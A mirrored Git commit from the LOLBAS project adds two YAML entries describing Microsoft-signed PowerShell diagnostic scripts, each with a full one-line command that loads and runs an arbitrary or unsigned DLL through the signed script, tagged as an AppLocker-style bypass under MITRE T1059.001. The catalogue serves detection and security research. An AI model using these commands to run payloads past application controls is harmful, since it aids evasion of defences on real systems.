public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-07-26 04:04:09 +02:00
Code Issues Projects Releases Wiki Activity

Merge branch 'master' into fixing-yaml-issues

Browse Source
This commit is contained in:
Oddvar Moe
2021-10-22 14:53:09 +02:00
committed by GitHub
parent 2e08819eef 3b848e6121
commit a55e2249c1
26 changed files with 535 additions and 9 deletions
Download Patch File Download Diff File Expand all files Collapse all files

26
yml/OSScripts/CL_LoadAssembly.yml Normal file
View File

@@ -0,0 +1,26 @@
---
Name: CL_LoadAssembly.ps1
Description: PowerShell Diagnostic Script
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: '”powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()'
Description: Proxy execute Managed DLL with PowerShell
Usecase: Execute proxied payload with Microsoft signed binary
Category: Execute
Privileges: User
MitreID: T1059.001
MitreLink: https://attack.mitre.org/techniques/T1059/001/
OperatingSystem: Windows 10 21H1 (likely other versions as well)
Full_Path:
- Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
Code_Sample:
- Code:
Detection:
- IOC:
Resources:
- Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/
Acknowledgement:
- Person: Jimmy
Handle: '@bohops'
---

26
yml/OSScripts/UtilityFunctions.yml Normal file
View File

@@ -0,0 +1,26 @@
---
Name: UtilityFunctions.ps1
Description: PowerShell Diagnostic Script
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: 'powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()”'
Description: Proxy execute Managed DLL with PowerShell
Usecase: Execute proxied payload with Microsoft signed binary
Category: Execute
Privileges: User
MitreID: T1059.001
MitreLink: https://attack.mitre.org/techniques/T1059/001/
OperatingSystem: Windows 10 21H1 (likely other versions as well)
Full_Path:
- Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1
Code_Sample:
- Code:
Detection:
- IOC:
Resources:
- Link: https://twitter.com/nickvangilder/status/1441003666274668546
Acknowledgement:
- Person: Nick VanGilder
Handle: '@nickvangilder'
---